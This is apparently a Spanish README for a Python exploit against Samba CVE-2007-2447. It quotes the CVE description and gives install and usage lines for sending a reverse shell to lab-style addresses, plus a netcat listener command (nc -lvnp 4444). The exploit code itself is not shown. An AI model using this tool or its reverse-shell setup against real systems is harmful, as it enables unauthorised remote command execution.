
Exploit en Python para Samba CVE-2007-2447, ejecución remota de comandos mediante el script de mapa de nombre de usuario, que envía un payload de shell inversa a un listener remoto configurable.
"La funcionalidad MS-RPC en smbd de Samba 3.0.0 hasta 3.0.25rc3 permite a atacantes remotos ejecutar comandos arbitrarios mediante metacaracteres de shell que involucran la función (1) SamrChangePassword, cuando la opción "username map script" de smb.conf está habilitada, y permite a usuarios autenticados remotos ejecutar comandos mediante metacaracteres de shell que involucran otras funciones MS-RPC en la (2) impresora remota y (3) gestión de recursos compartidos de archivos."
[*] Este exploit requiere Python 3.7 o superior
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost -- Host Remoto--lhost -- Host Local--lport -- Puerto Local--rport -- Puerto Remoto *[ ] Opcional. por defecto=445No olvides iniciar tu listener:
nc -lvnp 4444
